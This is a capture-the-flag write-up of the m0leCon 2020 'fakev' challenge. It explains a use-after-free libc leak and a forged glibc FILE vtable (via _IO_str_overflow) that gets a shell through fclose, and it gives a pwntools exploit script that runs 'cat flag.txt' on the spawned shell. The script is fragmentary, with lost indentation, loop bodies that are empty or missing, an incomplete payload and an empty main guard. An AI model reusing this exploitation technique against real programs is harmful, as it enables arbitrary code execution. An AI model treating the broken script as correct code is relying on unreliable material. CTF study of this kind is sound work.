Tags: pwn 


# m0leCon CTF 2020 Teaser

## fakev

This challenge was solved by [@korniltsev](https://ctftime.org/user/54962), [@mostobriv](https://ctftime.org/user/25913), [@n00bie](https://ctftime.org/user/50936) and me (on behalf of [Corrupted Pwnis](https://ctftime.org/team/87386)).

Writeup will not be super detailed, but rather brief overview of the solution.

`fakev` service allows us to open up to 9 files which are organized into a linked list of the following structure:

struct node_t {
FILE *file;
struct node_t *next;

Where `file` is a pointer into the file structure of the corresponding file. Also, we're able to close and read content of these files (write isn't implemented).

Basically, there are 2 vulns. The first one is UAF in reading file content (we can read the file content of the already closed file). The second one is placed inside of `add` function. When we create 9th file, service allocates new `struct node_t` for this file, but doesn't use it. Instead, it assigns stack address into `next` field of the previously opened file:

new_node = (node_t *)malloc(0x10uLL);
if ( !new_node )
perror("Couldn't alloc");
node->next = (node_t *)&stac;; // set next to stack
node->next->file = (_QWORD *)fp;
node->next->next = 0LL;

If we can control stack value, then we're able to change `next` into controlled `struct node_t` with controlled `file` field. In `get_int` function input that user supplies is then saved into the global variable (address of this variable is known because of disabled `PIE`).

Hence, attack vector is the next:

1. Leak libc address (will be explained below)
2. Change `next` field of the last opened file with the controlled one (already explained)
3. Point `file` into global variable which is controlled (already explained)
4. Call `fclose` on the `fake file` and get the shell (will be explained below).

The rest we need to do is to leak libc address and hijack the control flow when `fclose` is called on the fake file struct. Libc leaking can be done by filling up `tcache[0xf0]` and then using the first vuln (UAF in reading) to read content of the freed unsorted bin chunk.

Controlling the program flow after `fclose` is called can be done by forging the vtable of the fake file struct. Of course, we can't just point it to any fake vtable because of `_IO_vtable_check`. Fake vtable should be placed inside of libc vtable section. After searching for the right function, we're faced with `_IO_str_overflow`. Just satisfy the requirements and call arbitrary code with controlled `rdi`.

from pwn import *

def open_file(io, idx, fake_idx=None):
io.sendlineafter(':', '1')
if fake_idx is not None:
io.sendafter(':', fake_idx)
io.sendlineafter(':', str(idx))

def read_content(io, idx):
io.sendlineafter(':', '2')
io.sendlineafter(':', str(idx))

def close_file(io):
io.sendlineafter(':', '4')

def main():
libc = ELF('./libc.so.6')
io = remote('challs.m0lecon.it', 9013)

for idx in range(1, 9):
open_file(io, idx)
for idx in range(8):
log.info('tcache[0xf0] is filled up')

read_content(io, 1)
libc_arena = u64(io.recvn(17)[9:])
libc_base = libc_arena - 0x3ebca0

log.success('libc_arena @ ' + hex(libc_arena))
log.success('libc_base @ ' + hex(libc_base))

for idx in range(1, 9):
open_file(io, idx)
open_file(io, 1)

vtable = libc_base + 0x3e82a0
rdi = libc_base + next(libc.search('/bin/sh'))
system = libc_base + libc.symbols['system']

fake_file = ''
fake_file += p64(0x2000) # flags
fake_file += p64(0) # _IO_read_ptr
fake_file += p64(0) # _IO_read_end
fake_file += p64(0) # _IO_read_base
fake_file += p64(0) # _IO_write_base
fake_file += p64((rdi-100)/2) # _IO_write_ptr
fake_file += p64(0) # _IO_write_end
fake_file += p64(0) # _IO_buf_base
fake_file += p64((rdi-100)/2) # _IO_buf_end
fake_file += p64(0) # _IO_save_base
fake_file += p64(0) # _IO_backup_base
fake_file += p64(0) # _IO_save_end
fake_file += p64(0) # _markers
fake_file += p64(0) # _chain
fake_file += p64(0) # _fileno
fake_file += '\xff'*8
fake_file += p64(0)
fake_file += p64(0x602110)

fake_file += '\xff'*8
fake_file += p64(0)
fake_file += p64(0x602108) # file
fake_file += p64(0) # next
fake_file += p64(0)
fake_file += p64(0)
fake_file += p64(0)
fake_file += p64(0)
fake_file += p64(0)
fake_file += p64(vtable-0x3a8-0x88) # vtable
fake_file += p64(system) # alloc_buffer

payload = ''.join([
'4'.ljust(8, '\x00'),
]).ljust(0x100, '\x00')
log.success('embeded fake file struct into linked list')
log.info('triggering fclose on fake file struct...')

io.sendline('cat flag.txt')


if __name__ == '__main__':

> ptm{pl4y1ng_w17h_5t4cks_4nd_f1l3s_f0r_fun_4nd_pr0f}

Original writeup (https://github.com/merrychap/ctf-writeups/tree/master/2020/m0leCon/fakev).